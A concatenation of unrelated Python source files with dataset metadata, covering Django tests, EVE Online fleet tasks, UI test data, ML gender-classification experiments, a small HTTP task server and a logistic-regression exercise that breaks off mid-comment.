uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win-amd64\\egg\\li_rn_networks\\f_pfc_unit.py\n# Compiled at: 2020-02-18 02:17:35\n# Size of source mod 2**32: 1754 bytes\nimport math, numpy as np, random, non_neuron as nu\nW = np.array([[0, 1], [0.917, 0]])\n\nclass f_PFC_unit:\n\n def __init__(self, V_d, V_c):\n self.random_del = 1\n self.dt = 0.01\n self.Tau = 10\n self.Wl = np.array([[0, 0.99], [0.922, 0]])\n self.Wh = np.array([[0, 1.02], [0.875, 0]])\n self.b = np.array([[0.0, 0.0]])\n self.V_d = V_d\n self.V_c = V_c\n self.f_FPC_unit_d = nu.neuron()\n self.f_FPC_unit_d.def_parameter(self.Tau, self.dt, self.random_del)\n self.f_FPC_unit_c = nu.neuron()\n self.f_FPC_unit_c.def_parameter(self.Tau, self.dt, self.random_del)\n\n def def_parameter(self, Tau, dt, random_del):\n self.random_del = random_del\n self.dt = dt\n self.Tau = Tau\n self.f_FPC_unit_c.def_parameter(self.Tau, self.dt, self.random_del)\n self.f_FPC_unit_d.def_parameter(self.Tau, self.dt, self.random_del)\n\n def forward(self, S_d, S_c, ITd, ITc):\n b_d = np.zeros_like(S_d)\n b_c = np.zeros_like(S_c)\n self.V_d, S_d = self.f_FPC_unit_d.forward_it(self.V_d, S_d, self.Wl, b_d, ITd)\n self.V_c, S_c = self.f_FPC_unit_d.forward_it(self.V_c, S_c, self.Wl, b_c, ITc)\n return (S_d, S_c)","sub_path":"pycfiles/li_rn_networks-0.1-py3.7/f_pfc_unit.cpython-37.py","file_name":"f_pfc_unit.cpython-37.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"648230324","text":"import json\nfrom django.test import TestCase, Client\nfrom .models import Risk, RiskField, RiskFieldEnumOption\nfrom .enums import RiskTypes, DataTypes\nfrom .serializer import RiskSerializer, RiskFieldSerializer, RiskFieldEnumOptionSerializer\n# Create your tests here.\n\n\nclass SerializerTest(TestCase):\n\n def setUp(self):\n self.risk = Risk.objects.create(name='test', risk_type=RiskTypes.AM)\n RiskField.objects.create(name='text_field', dtype=DataTypes.TE, risk=self.risk,\n description='description')\n self.field_date = RiskField.objects.create(name='date_field', dtype=DataTypes.DA,\n risk=self.risk, description='description')\n self.field_enum = RiskField.objects.create(name='enum_field',\n dtype=DataTypes.EN, risk=self.risk, description='description')\n self.option = RiskFieldEnumOption.objects.create(risk_field_id=self.field_enum.id,\n option='option1')\n RiskFieldEnumOption.objects.create(risk_field_id=self.field_enum.id, option='option2')\n\n def test_risk_field_enum_option_serializer(self):\n opt_srlzr = RiskFieldEnumOptionSerializer(self.option)\n srlzr_data = opt_srlzr.data\n self.assertEqual(srlzr_data['option'], 'option1')\n\n def test_risk_field_serializer(self):\n fld_srlzr = RiskFieldSerializer(self.field_date)\n srlzr_data = fld_srlzr.data\n self.assertEqual(srlzr_data['name'], 'date_field')\n self.assertEqual(srlzr_data['description'], 'description')\n self.assertEqual(srlzr_data['dtype'], 'date')\n self.assertEqual(len(srlzr_data['options']), 0)\n\n fld_srlzr = RiskFieldSerializer(self.field_enum)\n srlzr_data = fld_srlzr.data\n self.assertEqual(srlzr_data['name'], 'enum_field')\n self.assertEqual(srlzr_data['description'], 'description')\n self.assertEqual(srlzr_data['dtype'], 'enum')\n self.assertEqual(len(srlzr_data['options']), 2)\n\n def test_risk_field(self):\n rsk_srlzr = RiskSerializer(self.risk)\n srlzr_data = rsk_srlzr.data\n self.assertEqual(srlzr_data['name'], 'test')\n self.assertEqual(srlzr_data['id'], self.risk.id)\n self.assertEqual(srlzr_data['risk_type'], 'automobile')\n self.assertEqual(len(srlzr_data['fields']), 3)\n\n\nclass ViewTest(TestCase):\n\n def setUp(self):\n self.risk = Risk.objects.create(name='test', risk_type=RiskTypes.AM)\n RiskField.objects.create(name='text_field', dtype=DataTypes.TE, risk=self.risk,\n description='description')\n self.field_date = RiskField.objects.create(name='date_field', dtype=DataTypes.DA,\n risk=self.risk, description='description')\n self.field_enum = RiskField.objects.create(name='enum_field',\n dtype=DataTypes.EN, risk=self.risk, description='description')\n self.option = RiskFieldEnumOption.objects.create(risk_field_id=self.field_enum.id,\n option='option1')\n RiskFieldEnumOption.objects.create(risk_field_id=self.field_enum.id, option='option2')\n\n def test_get_risk(self):\n client = Client()\n response = client.get('/get/risk/' + str(self.risk.id) + '/')\n self.assertEqual(response.status_code, 200)\n data = json.loads(response.content.decode('utf-8'))\n self.check_response(data)\n\n client = Client()\n response = client.get('/get/risk/' + str(self.risk.id + 10) + '/')\n self.assertEqual(response.status_code, 404)\n\n def test_get_all_risk(self):\n client = Client()\n response = client.get('/get/risks/')\n data = json.loads(response.content.decode('utf-8'))\n self.assertEqual(len(data), 1)\n self.check_response(data[0])\n\n def check_response(self, data):\n self.assertEqual(data['name'], 'test')\n self.assertEqual(data['risk_type'], 'automobile')\n self.assertEqual(data['id'], self.risk.id)\n self.assertEqual(len(data['fields']), 3)\n fields = sorted(data['fields'], key=lambda f: f['dtype'])\n self.assertEqual([f['name'] for f in fields], ['date_field', 'enum_field', 'text_field'])\n options = sorted(fields[1]['options'], key=lambda o: o['option'])\n self.assertEqual([o['option'] for o in options], ['option1', 'option2'])\n","sub_path":"risk_management/risk_type/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"338536133","text":"from .providers import esi\nfrom .models import Fleet, FleetInformation\nfrom esi.models import Token\nfrom celery import shared_task\nfrom django.utils import timezone\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\n@shared_task\ndef open_fleet(character_id, motd, free_move, name, groups):\n required_scopes = [\"esi-fleets.read_fleet.v1\", \"esi-fleets.write_fleet.v1\"]\n c = esi.client\n token = Token.get_token(character_id, required_scopes)\n fleet_result = c.Fleets.get_characters_character_id_fleet(\n character_id=token.character_id, token=token.valid_access_token()\n ).result()\n fleet_id = fleet_result.pop(\"fleet_id\")\n fleet_role = fleet_result.pop(\"role\")\n\n if fleet_id == None or fleet_role == None or fleet_role != \"fleet_commander\":\n return\n\n fleet = Fleet(\n fleet_id=fleet_id,\n created_at=timezone.now(),\n motd=motd,\n is_free_move=free_move,\n fleet_commander_id=token.character_id,\n name=name,\n )\n fleet.save()\n fleet.groups.set(groups)\n\n esiFleet = {\"is_free_move\": free_move, \"motd\": motd}\n c.Fleets.put_fleets_fleet_id(\n fleet_id=fleet_id, token=token.valid_access_token(), new_settings=esiFleet\n ).result()\n\n\n@shared_task\ndef send_fleet_invitation(character_ids, fleet_id):\n required_scopes = [\"esi-fleets.write_fleet.v1\"]\n c = esi.client\n fleet = Fleet.objects.get(fleet_id=fleet_id)\n fleet_commander_token = Token.get_token(fleet.fleet_commander_id, required_scopes)\n _processes = []\n with ThreadPoolExecutor(max_workers=50) as ex:\n for _chracter_id in character_ids:\n _processes.append(\n ex.submit(\n send_invitation,\n character_id=_chracter_id,\n fleet_commander_token=fleet_commander_token,\n fleet_id=fleet_id,\n )\n )\n for item in as_completed(_processes):\n _ = item.result()\n\n\n@shared_task\ndef send_invitation(character_id, fleet_commander_token, fleet_id):\n c = esi.client\n invitation = {\"character_id\": character_id, \"role\": \"squad_member\"}\n c.Fleets.post_fleets_fleet_id_members(\n fleet_id=fleet_id,\n token=fleet_commander_token.valid_access_token(),\n invitation=invitation,\n ).result()\n\n\n@shared_task\ndef check_fleet_adverts():\n required_scopes = [\"esi-fleets.read_fleet.v1\", \"esi-fleets.write_fleet.v1\"]\n c = esi.client\n fleets = Fleet.objects.all()\n for fleet in fleets:\n token = Token.get_token(fleet.fleet_commander_id, required_scopes)\n try:\n fleet_result = c.Fleets.get_characters_character_id_fleet(\n character_id=token.character_id, token=token.valid_access_token()\n ).result()\n fleet_id = fleet_result[\"fleet_id\"]\n if fleet_id != fleet.fleet_id:\n fleet.delete()\n except Exception as e:\n if e.status_code == 404: # 404 means the character is not in a fleet\n fleet.delete()\n logger.info(\"Character is not in a fleet - fleet advert removed\")\n\n\n@shared_task\ndef get_fleet_composition(fleet_id):\n required_scopes = [\"esi-fleets.read_fleet.v1\", \"esi-fleets.write_fleet.v1\"]\n c = esi.client\n fleet = Fleet.objects.get(fleet_id=fleet_id)\n token = Token.get_token(fleet.fleet_commander_id, required_scopes)\n fleet_infos = c.Fleets.get_fleets_fleet_id_members(\n fleet_id=fleet_id, token=token.valid_access_token()\n ).result()\n\n characters = {}\n systems = {}\n ship_type = {}\n\n for member in fleet_infos:\n characters[member[\"character_id\"]] = \"\"\n systems[member[\"solar_system_id\"]] = \"\"\n ship_type[member[\"ship_type_id\"]] = \"\"\n ids = []\n ids.extend(list(characters.keys()))\n ids.extend(list(systems.keys()))\n ids.extend(list(ship_type.keys()))\n\n ids_to_name = c.Universe.post_universe_names(ids=ids).result()\n for member in fleet_infos:\n index = [x[\"id\"] for x in ids_to_name].index(member[\"character_id\"])\n member[\"character_name\"] = ids_to_name[index][\"name\"]\n for member in fleet_infos:\n index = [x[\"id\"] for x in ids_to_name].index(member[\"solar_system_id\"])\n member[\"solar_system_name\"] = ids_to_name[index][\"name\"]\n for member in fleet_infos:\n index = [x[\"id\"] for x in ids_to_name].index(member[\"ship_type_id\"])\n member[\"ship_type_name\"] = ids_to_name[index][\"name\"]\n\n aggregate = get_fleet_aggregate(fleet_infos)\n\n differential = dict()\n\n for key, value in aggregate.items():\n fleet_info_agg = FleetInformation.objects.filter(\n fleet__fleet_id=fleet_id, ship_type_name=key\n )\n if fleet_info_agg.count() > 0:\n differential[key] = value - fleet_info_agg.latest(\"date\").count\n else:\n differential[key] = value\n FleetInformation.objects.create(fleet=fleet, ship_type_name=key, count=value)\n\n return FleetViewAggregate(fleet_infos, aggregate, differential)\n\n\n@shared_task\ndef get_fleet_aggregate(fleet_infos):\n counts = dict()\n\n for member in fleet_infos:\n type_ = member.get(\"ship_type_name\")\n if type_ in counts:\n counts[type_] += 1\n else:\n counts[type_] = 1\n return counts\n\n\nclass FleetViewAggregate(object):\n def __init__(self, fleet, aggregate, differential):\n self.fleet = fleet\n self.aggregate = aggregate\n self.differential = differential\n","sub_path":"fleet/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":5565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"389834189","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Author : HalsignRay\n\nfrom __future__ import unicode_literals\nfrom PublicTestData import *\nimport datetime\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\n_get_time = datetime.datetime.now()\n_expired_time = datetime.datetime.strftime(_get_time, '%Y-%m-%d')\n\n_other_symbol_list = special_symbol['other'][\n 'en_symbol'].values() + special_symbol['other']['cn_symbol'].values()\n_all_symbol_list = special_symbol[\n 'defalut_correct'].values() + _other_symbol_list\n_other_list = ['UserGroup_for_add_test', 'qwertyuiopasdfghjklzxcvbnm',\n '1234567890', 'QWERTYUIOPASDFGHJKLZXCVBNM9']\n\n# 操作界面弹窗提示信息(右下角)\nUserGroupLobiboxNotifyInfo = {\n 'title1': '操作成功',\n 'title2': '友情提示',\n 'msg_add': '操作成功' # 用户组添加成功提示信息\n}\n\n# 用户组管理界面信息\nUserGroupManageUIInfo = {\n 'Title': '用户组',\n 'AddButton': '新建用户组',\n 'AddButtonTitle': '新建一个用户组',\n 'SearchButton': '搜索',\n 'SearchLabel': '用户组名称',\n 'TabelHead': {\n 'Name': '用户组',\n 'SuperiorGroup': '所属用户组',\n 'Creater': '创建人',\n 'CreateTime': '创建时间',\n 'Opreation': '操作'\n }\n}\n\n# 用户组编辑界面信息\nUserGroupEditUIInfo = {\n 'AddTitle1': '新建用户组',\n 'AddTitle2': '新建用户组',\n 'EditTitle1': '编辑用户组',\n 'EditTitle2': '编辑用户组',\n 'Name': {\n 'Label': '用户组名称',\n 'MaxLength': '64'\n },\n 'SuperiorLabel': '上级用户组',\n 'Describe': {\n 'Label': '用户组描述',\n 'MaxLength': '150'\n },\n 'SaveButton': '保存',\n 'CancelButton': '取消',\n 'ErrorMsg': {\n 'EmptyName': '用户组名称不能为空!',\n 'ErrorName': '用户组名称请选择常用字符,比如汉字,英文,数字等!不能使用逗号,斜杠等特殊字符'\n }\n}\nrightStr = '%——·!……)(】【���;:;:,《。》?中'\nerrorlist = set(list(errorSymbol)) - set(list(rightStr))\nUserGroupTestData = {\n 'vTopUser': {\n 'username': 'username_for_test_UserGroup',\n 'realname': 'realname_for_test_UserGroup'\n },\n 'GroupName': ['汉字', rightSymbol + rightStr, number, letters],\n 'ErrorName': errorlist,\n 'DefaultName': 'UserGroup_for_Test',\n 'DefaultGroup': '初始用户组',\n 'EditName': 'UserGroup_EditName_for_Test',\n 'DeleteName': {\n 'Default': 'Default_delete_for_usergroup',\n 'HaveSubset': 'HaveSubset_UserGroup_Test',\n 'Subset': 'SubSet_UserGroup_for_Test',\n 'Allocated': 'Allocated_UserGroup_for_Test'\n },\n 'SuperiorNumber': 109,\n 'Describe': [errorSymbol, rightSymbol, number, letters],\n 'Creater': {\n 'Admin': '管理员'\n },\n 'SearchGroup': {\n 'GroupList': ['group_search5', 'group_search1',\n 'group_search2', 'group_search3'], # 需要包含search字段\n 'NotExistGroup': '不存在的用户组搜索',\n 'MultipleSearchField': 'search',\n 'SearchSpecialSymbol': [errorSymbol, rightSymbol, number, letters]\n },\n 'CreatTime': _expired_time # 时间为日期,没有算到具体几时几分几秒\n}\n","sub_path":"vTopCenterWebAutomation-1.0/TestData/UserGroupTestData.py","file_name":"UserGroupTestData.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"294879047","text":"import os\nfrom common.config import IMG_TYPE\n\n\ndef feature_extract(img_path, model):\n feats = []\n feat = model.vgg_extract_feat(img_path)\n image_name = os.path.split(img_path)[1]\n feats.append(feat)\n return feats, image_name\n\n\ndef recursive(path):\n list = os.listdir(path)\n arr = []\n for l in list:\n if(os.path.isdir(os.path.join(path,l))):\n cpath = os.path.join(path, l)\n arr += recursive(cpath)\n arr.append(os.path.join(path,l))\n return arr\n\n\ndef filter_img(path):\n # file_list = os.listdir(path)\n file_list = recursive(path)\n return [os.path.join(path, f) for f in file_list if f.split('.')[-1] in IMG_TYPE]\n","sub_path":"encoder/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"447074351","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 13 17:14:33 2021\n\n@authors:\n João Matos\n Maria Loureiro\n Maria Carvalho\n \n\"\"\"\nimport numpy as np\nfrom timeit import default_timer as timer\nfrom data_load import getDataset, getTestDataset\nfrom evaluation_metrics import getMetrics, getGeneralMetrics, displayGeneralMetrics, displayMetrics\nfrom sklearn import svm\nfrom sklearn.decomposition import PCA\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.feature_selection import SelectKBest, f_classif\nfrom feature_selection import plot_score_features\nfrom sklearn import preprocessing as pp\nfrom sklearn.linear_model import LogisticRegressionCV\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.metrics import confusion_matrix\nimport seaborn as sn\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n#%% SVM models for Gender\n\ndef genderSVM():\n \n # SVM Parameters\n probability_ = True\n C_ = 100\n kernel_ = 'linear'\n gamma_ = 0.01\n with_PCA_= True\n PCA_variability_ = 0.95\n with_ANOVA_ = False\n k_features_ = 3\n \n # Create Model\n svc = svm.SVC(probability=probability_,\n random_state=42, \n C=C_, \n kernel=kernel_, \n gamma=gamma_)\n\n # Pipelines\n if with_PCA_:\n #Create PCA to redimention features to have X % variability\n pca = PCA(n_components=PCA_variability_, random_state=42)\n \n model = make_pipeline(pca, svc)\n \n elif with_ANOVA_:\n \n #ANOVA filter, take best features\n anova_filter = SelectKBest(f_classif, k=k_features_)\n \n # Make Pipeline\n model = make_pipeline(anova_filter, svc)\n else: \n model = svc\n \n return model\n\n#%% Logistic Regression model for Gender\n\ndef genderLogReg():\n #normalizing the features\n scaler = pp.StandardScaler()\n \n # Train Logistics Regression\n logReg = LogisticRegressionCV(Cs= 50, solver='newton-cg', random_state=42)\n \n model = make_pipeline(scaler, logReg)\n \n with_PCA_= False\n PCA_variability_ = 0.95\n with_ANOVA_ = False\n k_features_ = 3\n \n # Pipelines\n if with_PCA_:\n #Create PCA to redimention features to have X % variability\n pca = PCA(n_components=PCA_variability_, random_state=42)\n \n model = make_pipeline(pca, model)\n \n elif with_ANOVA_:\n \n #ANOVA filter, take best features\n anova_filter = SelectKBest(f_classif, k=k_features_)\n \n # Make Pipeline\n model = make_pipeline(anova_filter, model)\n \n return model\n\n#%% Random Forest model for Gender\n\ndef genderRandomForest():\n # RandomForest Parameters \n n_estimators_ = 250\n max_features_ = 'auto'\n max_depth_ = 10\n min_samples_leaf_ = 20\n bootstrap_=True\n with_ANOVA_ = False\n k_features_ = 3\n with_PCA_= False\n PCA_variability_ = 0.95\n \n randForest = RandomForestClassifier(n_estimators=n_estimators_,\n max_features=max_features_,\n max_depth= max_depth_,\n min_samples_leaf=min_samples_leaf_,\n bootstrap = bootstrap_,\n random_state=42)\n \n if with_PCA_:\n #Create PCA to redimention features to have X % variability\n pca = PCA(n_components=PCA_variability_, random_state=42)\n \n model = make_pipeline(pca, randForest)\n \n elif with_ANOVA_:\n \n #ANOVA filter, take 3 best features\n anova_filter = SelectKBest(f_classif, k=k_features_)\n \n # Make Pipeline\n model = make_pipeline(anova_filter, randForest)\n \n else:\n model = randForest\n \n return model\n\n#%% MLP Classifier for Gender\n\ndef genderMLPClassifier():\n # Parameters for MLP classifier\n hidden_layer_sizes_=(100)\n activation_='relu'\n solver_='sgd'\n alpha_=.01\n learning_rate_='adaptive'\n early_stopping_ = True\n max_iter_=500\n with_ANOVA_ = False\n k_features_ = 3\n with_PCA_= False\n PCA_variability_ = 0.95\n \n mlpClass = MLPClassifier(hidden_layer_sizes= hidden_layer_sizes_, \n activation = activation_, \n solver=solver_, \n alpha = alpha_, \n learning_rate = learning_rate_ , \n max_iter=max_iter_, \n early_stopping = early_stopping_,\n random_state=42)\n\n\n if with_PCA_:\n #Create PCA to redimention features to have X % variability\n pca = PCA(n_components=PCA_variability_, random_state=42)\n \n model = make_pipeline(pca, mlpClass)\n \n elif with_ANOVA_:\n \n #ANOVA filter, take 3 best features\n anova_filter = SelectKBest(f_classif, k=k_features_)\n \n # Make Pipeline\n model = make_pipeline(anova_filter, mlpClass)\n \n else:\n model = mlpClass\n \n return model\n\n#%% Cross Validation for Train\nstart = timer()\n\nmetrics_tr = []\nmetrics_val = []\n\n# cross validation for train\nfor number in range(10):\n\n language = ''\n mode = 'SubjectDependent'\n x_tr, y_tr, x_val, y_val, = getDataset(number, language, mode)\n x_TS, y_TS = getTestDataset(language, mode)\n \n lanEnglish_tr = y_tr[:,4]\n lanEnglish_val = y_val[:,4]\n lanEnglish_TS = y_TS[:,4] #0 for English; 1 for Native\n\n y_tr = y_tr[:,1]\n y_val = y_val[:,1]\n y_TS = y_TS[:,1] #age\n\n #model = genderSVM()\n #model = genderLogReg()\n model = genderRandomForest()\n #model = genderMLPClassifier()\n model.fit(x_tr, y_tr)\n\n # Assess *this* model\n metrics_tr.append(getMetrics(model, x_tr, y_tr, 'withProbs'))\n metrics_val.append(getMetrics(model, x_val, y_val, 'withProbs'))\n\n\nsMetrics_tr = getGeneralMetrics(metrics_tr, 5)\nsMetrics_val = getGeneralMetrics(metrics_val, 5)\n\nprint('Cross-Validation\\n')\nprint('Training Set')\ndisplayGeneralMetrics(sMetrics_tr)\nprint('\\n')\nprint('Validation Set')\ndisplayGeneralMetrics(sMetrics_val)\nprint('\\n')\n\n#%% Final train, before test\n\nx_TR = np.concatenate((x_tr,x_val), axis=0)\ny_TR = np.concatenate((y_tr,y_val), axis=0)\nlanEnglish_TR = np.concatenate((lanEnglish_tr,lanEnglish_val), axis=0)\n\nmodel.fit(x_TR, y_TR)\n\nprint('\\nComplete Train Set')\nmetrics = getMetrics(model, x_TR, y_TR, 'withProbs')\ndisplayMetrics(metrics)\n\n# Comparison of English / Native utterances\nx_TR_english = x_TR[np.where(lanEnglish_TR == 0)]\ny_TR_english = y_TR[np.where(lanEnglish_TR == 0)]\n\nx_TR_native = x_TR[np.where(lanEnglish_TR == 1)]\ny_TR_native = y_TR[np.where(lanEnglish_TR == 1)]\n\nprint('\\nEnglish Results:')\nmetrics = getMetrics(model, x_TR_english, y_TR_english, 'withProbs')\ndisplayMetrics(metrics)\n\nprint('\\nNative Results:')\nmetrics = getMetrics(model, x_TR_native, y_TR_native, 'withProbs')\ndisplayMetrics(metrics)\n\nplot_score_features(x_TR, y_TR)\n\n#%% Test Model\n\nprint('\\nTest Set')\nmetrics = getMetrics(model, x_TS, y_TS, 'withProbs')\ndisplayMetrics(metrics)\n\n# Comparison of English / Native utterances\nx_TS_english = x_TS[np.where(lanEnglish_TS == 0)]\ny_TS_english = y_TS[np.where(lanEnglish_TS == 0)]\n\nx_TS_native = x_TS[np.where(lanEnglish_TS == 1)]\ny_TS_native = y_TS[np.where(lanEnglish_TS == 1)]\n\nprint('\\nEnglish Results:')\nmetrics = getMetrics(model, x_TS_english, y_TS_english, 'withProbs')\ndisplayMetrics(metrics)\n\nprint('\\nNative Results:')\nmetrics = getMetrics(model, x_TS_native, y_TS_native, 'withProbs')\ndisplayMetrics(metrics)\n\ny_pred = model.predict(x_TS)\nc=confusion_matrix(y_TS, y_pred)\ndf_cm = pd.DataFrame(c, range(2), range(2))\nsn.set(font_scale=1.4) # for label size\nsn.heatmap(df_cm, annot=True, annot_kws={\"size\": 16}, cmap=\"YlGnBu\") # font size\n \nplt.xlabel(\"Predicted Classes\")\nplt.ylabel(\"Actual Classes\")\nplt.title(\"Confusion Matrix - Random Forest, Subject-Dependent\")\nplt.show()\nend = timer()\nprint(f'{end-start:.3f}', 's')\n","sub_path":"gender_classification.py","file_name":"gender_classification.py","file_ext":"py","file_size_in_byte":8085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"378053136","text":"from http.server import BaseHTTPRequestHandler, HTTPServer \r\nimport os\r\nimport threading\r\nimport re\r\nimport subprocess\r\nfrom pathlib import Path\r\n\r\n\"\"\" Класс генератор содержит в себе ip процесса-генератора и номер задачи (потом, возможно, список подзадач) \"\"\"\r\n\r\nclass Generator:\r\n\tdef __init__(self, t, ip):\r\n\t\tself.task = t;\r\n\t\tself.IP = ip\r\n\t\tself.cond = True;\r\n\tdef show(self):\r\n\t\treturn \"Task {0}: Generator IP {1} {2}\".format(self.task, self.IP, \"works\\n\" if self.cond else \"broken \\n\")\r\n\"\"\" метод возвращает всю информацию о генераторе \"\"\"\r\n\r\n\r\nGenerators = {11: Generator(11, 'TestGen.py'), 2 :Generator(2,'TestGen2.py')}\r\n\r\n\r\ndef Gens_Cond():\r\n\tG = ''\r\n\tfor i in Generators.keys():\r\n\t\tG+= Generators.get(i).show()\r\n\treturn G\r\n\r\n\r\n\"\"\" Request Handler \"\"\"\r\n\r\nclass FacadeHandler(BaseHTTPRequestHandler): \r\n\tdef do_GET(self): \r\n\t\trootdir =\"C:/Users/Public/Documents/Programming/Project\" \r\n\t\ttry: \r\n\t\t\tif self.headers['request'] == 'get_tasklist': #запрос списка задач \r\n\t\t\t\tself.send_response(200) \r\n\t\t\t\tself.send_header('request','get_tasklist') \r\n\t\t\t\tself.end_headers() \r\n\t\t\t\tself.wfile.write(Gens_Cond().encode('utf-8')) \r\n\t\t\tif self.headers['request'] == 'get_task': \r\n\t\t\t\tid = int(self.headers['taskID'])\r\n\t\t\t\tif Generators.get(id) != None:\r\n\t\t\t\t\tcmd=rootdir+'/' + Generators.get(id).IP\r\n\t\t\t\t\tif(Path(cmd).exists()):\r\n\t\t\t\t\t\ttry:\r\n\t\t\t\t\t\t\tp = subprocess.Popen(cmd, shell = True, stdout=subprocess.PIPE)\r\n\t\t\t\t\t\t\tp.wait()\r\n\t\t\t\t\t\t\tprint(cmd)\r\n\t\t\t\t\t\t\tself.send_response(200)\r\n\t\t\t\t\t\t\tself.send_header('request','get_task')\r\n\t\t\t\t\t\t\tself.send_header('task.ID', self.headers['task.ID'])\r\n\t\t\t\t\t\t\tself.end_headers()\r\n\t\t\t\t\t\t\tself.wfile.write(p.stdout.read())\r\n\t\t\t\t\t\texcept:\r\n\t\t\t\t\t\t\tself.send_error(405)\r\n\t\t\t\t\t\t\tGenerators.get(id).cond = False\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tself.send_error(405)\r\n\t\t\t\t\t\tGenerators.get(id).cond = False\r\n\t\t\t\telse:\r\n\t\t\t\t\tprint(id);\r\n\t\t\t\t\tprint(Generators.get(id)) \r\n\t\t\t\t\tself.send_error(406) \r\n\t\texcept IOError: \r\n\t\t\tself.send_error(404)\r\n\t\t\t \r\ndef run(server_class=HTTPServer, handler_class=FacadeHandler):\r\n\tserver_address = ('127.0.0.1', 8000)\r\n\thttpd = server_class(server_address, handler_class)\r\n\ttry:\r\n\t\tprint('server is running')\r\n\t\thttpd.serve_forever()\r\n\texcept KeyboardInterrupt:\r\n\t\tprint('server terminated by keyboard')\r\n\r\nif __name__ == '__main__':\r\n\tprint(Generators.keys())\r\n\trun()\r\n\r\n\t\t\r\n\t","sub_path":"Facade.py","file_name":"Facade.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"79437417","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 28 15:20:49 2020\r\n\r\n@author: jghuynh\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport sklearn as sk\r\nimport sklearn.model_selection\r\n\r\n#%%\r\n\r\ndef removeUnnecessaryCols(myDataFrame):\r\n # more than 99% of values is False\r\n myDataFrame.drop(\"_unit_state\", axis = 1, inplace = True) \r\n \r\n # more than 99% of these values are 3\r\n myDataFrame.drop(\"_trusted_judgments\", axis = 1, inplace = True)\r\n \r\n # we don't need links. All these links are like an ID--unique for every person\r\n myDataFrame.drop(\"profileimage\", axis = 1, inplace = True)\r\n \r\n # 100% of values are \"yes\"\r\n myDataFrame.drop(\"profile_yn\", axis = 1, inplace = True)\r\n \r\n # 97% of values are 0\r\n myDataFrame.drop(\"retweet_count\", axis = 1, inplace = True)\r\n \r\n # all names of tweets are IDs. They are unique, so they don't affect data\r\n myDataFrame.drop(\"name\", axis = 1, inplace = True)\r\n \r\n # link bar color, side bar color--they have the same values, so eliminate\r\n myDataFrame.drop(\"link_color\", axis = 1, inplace = True )\r\n \r\n # name and text are all unique values. None of them are the same, so eliminate\r\n myDataFrame.drop(\"text\", axis = 1, inplace = True)\r\n \r\n # so many of tweet_location are invalid or written in weird symbols\r\n myDataFrame.drop(\"tweet_location\", axis = 1, inplace = True)\r\n \r\n return myDataFrame\r\n\r\ndef oneHotEncode(myDataFrame):\r\n #stringCols = []\r\n #X = myDataFrame\r\n \r\n for column in myDataFrame.columns:\r\n #print(\"column =\", column, \" type = \", myDataFrame[column].values.dtype)\r\n if \"O\" == myDataFrame[column].values.dtype:\r\n \r\n '''\r\n if column == \"tweet_location\":\r\n if len(myDataFrame[column]) > 5:\r\n myDataFrame.drop(\"tweet_location\", axis = 0, inplace = True)\r\n '''\r\n #stringCols.append(column)\r\n oneHot = pd.get_dummies(myDataFrame[column])\r\n myDataFrame = myDataFrame.drop(column, axis = 1)\r\n myDataFrame = myDataFrame.join(oneHot)\r\n \r\n \r\n #myDataFrame = myDataFrame.drop(myDataFrame.std()[myDataFrame.std() < 0.6].index.values, axis = 1)\r\n #print(stringCols)\r\n print(myDataFrame)\r\n return myDataFrame\r\n\r\n\r\n\r\n# Calculates the error between the predicted value and \r\n# the truth value\r\n# AKA l(yi, qi)\r\n#\r\n# @param yi the actual ground truth\r\n# @param qi the predicted probablity \r\n# @return the calculated error/binary cross entropy\r\ndef binaryCrossEntropy(yi, qi):\r\n return -(yi * np.log(qi) + (1 - yi)* np.log(1 - qi))\r\n\r\n# Converts a scaler into a probability\r\n# @param u the scaler (also, the predicted value)\r\n# @return the probability\r\ndef sigmoid(u):\r\n #e = np.exp(1)\r\n expu = np.exp(u)\r\n return expu/(1 + expu)\r\n #return e**u/(1 + e**u)\r\n \r\n\r\n# Calculates the binary cross entropy\r\n# @param yi the ground truth value\r\n# @param u the predicted probability \r\ndef hi(u, yi):\r\n \r\n exp = np.exp(u)\r\n return -yi*u + np.log(1 + exp)\r\n\r\n# Gets the sum of all the hi's/errors\r\ndef L(beta, X, Y):\r\n N = X.shape[0] # numer of rows\\\r\n #cols = X.shape[1]\r\n mySumHi = 0\r\n \r\n # for every row in X\r\n for i in range(N):\r\n xihat = X[i] # the ith row of X\r\n yi = Y[i] # 1 row in X => 1 scaler (0 or 1) in Y\r\n #print(\"xihat\", xihat)\r\n #print(\"beta\", beta)\r\n dotProduct = np.vdot(xihat, beta)\r\n mySumHi += hi(dotProduct, yi)\r\n return mySumHi\r\n\r\n\r\n# Calculats the clip of beta with alpha step size\r\n# Basically, beta will go close to origin with 